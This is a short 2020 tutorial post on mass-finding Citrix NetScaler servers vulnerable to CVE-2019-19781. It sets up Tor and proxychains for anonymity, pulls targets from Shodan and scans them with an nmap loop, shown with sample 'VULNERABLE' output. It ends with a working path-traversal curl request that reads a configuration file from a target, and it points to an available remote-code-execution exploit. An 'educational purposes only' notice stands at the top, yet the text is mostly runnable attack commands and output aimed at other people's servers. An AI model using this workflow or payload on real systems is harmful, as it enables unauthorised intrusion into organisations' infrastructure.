citrix-vulnerability

How find a vulnerable citrix netscaler server on the internet?
2020 may 14th

NOTICE: Educational purposes only!

Hi, I want to show you how easy it is to find a vulnerable server on the internet. Okey guys, so now, firstly we need to have some TOR client for anonymity 😉 Before we begin, look at the following tools

$ tor &
$ nyx -i 127.0.0.1:9052
Then we can test, if the tor is working correctly with proxychains
$ proxychains curl ifconfig.me
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  127.0.0.1:9050  ...  ifconfig.me:80  ...  OK
46.166.139.111
Run shodan to get all open services which look like Citrix ADC Gateway
$ proxychains -q shodan search --fields="ip_str,port" citrix netscaler > $HOME/citrix_list
Now we will prepare a script that scans the vulnerability CVE-2019-19781 in these services
#!/bin/bash

CITRIX_IP_LIST="$HOME/citrix_list"

while read CITRIX_IP_PORT; do
          IP=$(echo $CITRIX_IP_PORT | awk '{print $1}')
        PORT=$(echo $CITRIX_IP_PORT | awk '{print $2}')
        proxychains -q nmap -p $PORT -sV --script CVE-2019-19781 $IP
done < $CITRIX_IP_LIST
After a short moment we get some interesting results. There are still servers with this vulnerability present.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:16 CET                                                                                                                                                                                                
Nmap scan report for ---.---.---.---                                                                                                                                                                                      
Host is up (0.75s latency).                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                               
PORT      STATE SERVICE     VERSION                                                                                                                                                                                                                            
----/tcp open  ssl/unknown                                                                                                                                                                                                                                    
| CVE-2019-19781:                                                                                                                                                                                                                                              
|   VULNERABLE:                                                                                                                                                                                                                                                
|   Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)                                                                                                                                                                        
|     State: VULNERABLE                                                                                                                                                                                                                                        
|     IDs:  CVE:CVE-2019-19781                                                                                                                                                                                                                                 
|     Risk factor: HIGH                                                                                                                                                                                                                                                                                                        
|                   A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.                                                                                                                                                                                                                                                                                                
|                                                                                                                                            
|     Disclosure date: 2019-12-17                                                                                                                                                     
|     References:                                                                                                                            
|       https://support.citrix.com/article/CTX267027                                                                                                           
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                            
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                      
Nmap done: 1 IP address (1 host up) scanned in 152.99 seconds                              

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:18 CET                                                                                                                                                     
Nmap scan report for ---.---.---.---
Host is up (0.47s latency).                                                                                                                                                           
                                                                                                          
PORT      STATE SERVICE     VERSION                                                                                                                                                   
----/tcp open  ssl/unknown                                                                               
| CVE-2019-19781:                                                                                                                                                                                                                                                                                                                                                                                                                        
|   VULNERABLE:                                                                                           
|   Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)                                                                                                                             
|     State: VULNERABLE                                                                                   
|     IDs:  CVE:CVE-2019-19781                                                                            
|     Risk factor: HIGH                                                                                                                                                                                             
|                   A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.                                                                                                                                                                                                                                                                                                
|                                                                                                                                                                                                                   
|     Disclosure date: 2019-12-17                                                                         
|     References:                                                                                         
|       https://support.citrix.com/article/CTX267027                                                      
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781                                                                                                                                               

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                      
Nmap done: 1 IP address (1 host up) scanned in 142.11 seconds                                             

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:21 CET                                                                                                                                                     
Nmap scan report for ---.---.---.---
Host is up (0.53s latency).                                                                               

PORT      STATE SERVICE     VERSION                                                                       
----/tcp open  ssl/unknown                                                                               
| CVE-2019-19781:                                                                                         
|   VULNERABLE:                                                                                           
|   Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)                                                                                                                             
|     State: VULNERABLE                                                                                   
|     IDs:  CVE:CVE-2019-19781                                                                            
|     Risk factor: HIGH                                                                                   
|                   A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.                                                                                                                                                                                                                                                                                                
|                                                                                                         
|     Disclosure date: 2019-12-17                                                                         
|     References:                                                                                         
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781                                                                                                                                               
|_      https://support.citrix.com/article/CTX267027                                                      

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                      
Nmap done: 1 IP address (1 host up) scanned in 155.56 seconds                                             
We can verify the vulnerability by using curl.
$ proxychains -q curl -k --path-as-is https://<host>:<port>/vpn/../vpns/cfg/smb.conf  && echo -e
[global]
        encrypt passwords = yes
        name resolve order = lmhosts wins host bcast
And that’s it. 🙂 We will not continue from this point, but there exists a RCE exploit that enables the user to gain full control.